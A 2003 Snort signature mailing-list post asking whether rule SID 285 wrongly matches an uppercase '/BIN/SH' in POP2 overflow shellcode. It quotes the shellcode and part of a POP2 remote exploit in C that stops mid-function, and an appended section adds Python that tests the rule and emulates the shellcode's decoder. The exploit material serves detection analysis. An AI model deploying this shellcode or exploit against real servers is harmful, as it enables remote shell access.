[Snort-sigs] Question on SID 285

Steven Alexander alexander.s at ...1565...
Tue Jun 10 12:00:03 EDT 2003


SID 285 is supposed to detect shellcode being sent to port 109 (Pop-2).
My question is on the origin of this rule.  The last bytes of this
shellcode (2f 4249 4e2f 5348) translate to the ASCII characters
"/BIN/SH".  Since Unixes are case sensitive this would not produce the
desired result for an attacker.  For a working exploit it should be "2f
6269 6e2f 7368" which corresponds to "/bin/sh".  Was this rule produced
from a dump of a successful attack?  Sometimes, exploits are modified in
order to disable their use by other hackers not in the know.  There may
be both working and non-working versions of this attack in existence and
it may be useful to detect each of them.  I was able to find a pop-2
exploit that uses the following shellcode:

  "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01"
  "\x20\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89"
  "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0"
  "\xfe\xc0\xcd\x80\xe8\xcf\xff\xff\xff\x0f\x42\x49\x4e\x0f"
  "\x53\x48";

The last bytes of this shellcode correspond to the ASCII ".BIN.SH" which
would also not work.  The first bytes "eb2c 5b89 d980 c106 39d9 7c07
8001" correspond to some of the executable code and would however be
detected by SID 284.

Should more rules be created or did I miss something?

-steven


Sid 285 is as follows:

alert tcp $EXTERNAL_NET any -> $HOME_NET 109 (msg:"POP2 x86 Linux
overflow"; flow:to_server,established; content:"|ffff ff2f 4249 4e2f
5348 00|"; classtype:attempted-admin; sid:285; rev:6;) 

The following is the pop-2 exploit that I was able to find:

/*
 * A pop-2 remote exploit that gives a nobody shell.
 * gcc pop.c -o pop -O3 -Wall 
 * Autodetects what version you're sploiting and adjusts ret position and
 * offset accordingly.
 * Tested on redhat 5.2, 5.1, 5.0 and 4.2. Probably only really useful
 * using it on 5.2 tho, cos the rest will most likely have imap open too.
 * NB: To exploit pop-2 you have to take into account the length of both
 * the hostname and username(unlike all the pop2 exploits out there).
 * - smiler
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

unsigned char hellcode[]=
  "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01"
  "\x20\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89"
  "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0"
  "\xfe\xc0\xcd\x80\xe8\xcf\xff\xff\xff\x0f\x42\x49\x4e\x0f"
  "\x53\x48";

struct type
  {
    char *text;
    int offset;
    int alignment;
  };

struct type types[]=
    {
      {"4.46",0,0},
      {"3.35",0,19},
      {"3.44",0,19},
      {"2.3(30)",0,19},
      {NULL,0,0}
    };

int pop2_type = 0;

#define RET 0xbffff5b1

void usage(char *prog);
int resolv(char *hname, struct in_addr *addr);
int send_oberflow(int fd, char *host, char *user, int offset);
void run_shell(int fd);
int set_pop_type(char *buf, int n);
int do_connect(struct sockaddr_in *serv);

char temp_pass[20], *password;

int main(int argc, char **argv)
{
  int fd,n;
  unsigned char buf[2048];
  struct sockaddr_in servaddr;

  if (argc < 5)
    usage(argv[0]);

  password = strdup(argv[3]);
  bzero(argv[3],strlen(argv[3]));

  /* Mask the password from the cmdline =) */
  bzero(&servaddr,sizeof(servaddr));
  servaddr.sin_family = AF_INET;
  servaddr.sin_port = htons(109);
  if (!resolv(argv[4],&servaddr.sin_addr))
    {
      herror("resolv");
      exit(-1);
    }
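The signature question above comes down to what bytes are actually on the wire versus what the rule's `content:` option looks for. The following is an added example, not part of Steven's post or of the exploit he quotes: it parses a Snort `content:` string the way the rule engine does (literal text outside `|...|`, hex bytes inside), tests SID 285's content against constructed sample payloads, and emulates the small decoder at the front of the quoted shellcode. That decoder (`80 01 20` is `add byte [ecx], 0x20`, looping from the call-pushed address plus 6 down to plus 0) adds 0x20 to each of the seven trailing bytes, so `0f 42 49 4e 0f 53 48` becomes `/bin/sh` only at run time; the packet itself never carries the lowercase string, which is why a rule keyed on the decoded string misses it. The sample payloads are constructed here; the emulation assumes the usual case where the decrement of `cl` does not wrap.

```python
import re

# SID 285 content option, copied from the rule quoted in the post.
SID285_CONTENT = "|ffff ff2f 4249 4e2f 5348 00|"

# The shellcode quoted in the post, byte for byte.
POSTED_SHELLCODE = bytes.fromhex(
    "eb2c5b89d980c10639d97c078001"
    "20fec9ebf5895b0831c088430789"
    "430cb00b8d4b088d530ccd8031c0"
    "fec0cd80e8cfffffff0f42494e0f"
    "5348"
)


def parse_snort_content(content: str) -> bytes:
    """Convert a Snort content: string to raw bytes.

    Text outside |...| is taken literally; inside the bars, hex digits are
    bytes and whitespace is ignored, e.g. "|ff ff|/BIN" -> b"\\xff\\xff/BIN".
    """
    out = bytearray()
    pos = 0
    while pos < len(content):
        if content[pos] == "|":
            end = content.index("|", pos + 1)
            out += bytes.fromhex(re.sub(r"\s+", "", content[pos + 1:end]))
            pos = end + 1
        else:
            out.append(ord(content[pos]))
            pos += 1
    return bytes(out)


def content_matches(payload: bytes, content: str) -> bool:
    """Case-sensitive substring match, as a rule without 'nocase' behaves."""
    return parse_snort_content(content) in payload


def decode_trailer(shellcode: bytes, n: int = 7) -> bytes:
    """Emulate the decoder loop at the start of the shellcode.

    The loop adds 0x20 to each of the last n bytes (n = 7 for the quoted
    payload), turning the uppercase/0x0f form into the string execve needs.
    Assumes the decrement of cl in the loop does not wrap (normal alignment).
    """
    return bytes((b + 0x20) & 0xFF for b in shellcode[-n:])


# Constructed sample payloads (not captures).
PAYLOAD_RULE_FORM = b"USER " + b"A" * 16 + b"\xff\xff\xff/BIN/SH\x00"
PAYLOAD_LOWER = b"USER " + b"A" * 16 + b"\xff\xff\xff/bin/sh\x00"
PAYLOAD_POSTED = b"USER " + b"A" * 16 + POSTED_SHELLCODE + b"\x00"


def evaluate() -> dict:
    """Run SID 285's content against each sample and decode the trailer."""
    return {
        "rule_form": content_matches(PAYLOAD_RULE_FORM, SID285_CONTENT),
        "lowercase": content_matches(PAYLOAD_LOWER, SID285_CONTENT),
        "posted_exploit": content_matches(PAYLOAD_POSTED, SID285_CONTENT),
        "decoded_trailer": decode_trailer(POSTED_SHELLCODE),
    }


if __name__ == "__main__":
    for name, value in evaluate().items():
        print(f"{name}: {value!r}")
```

Running it shows SID 285 firing only on the exact `ff ff ff 2f 42 49 4e 2f 53 48 00` sequence: the lowercase variant and the quoted exploit (whose trailer is `0f 42 ...`, not `2f 42 ...`) both go undetected, while the decoder emulation confirms the quoted payload produces `/bin/sh` in memory. For detection, this argues for keying on the invariant decoder or syscall bytes (the part SID 284 already covers) rather than on a string that may be encoded differently in every variant.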
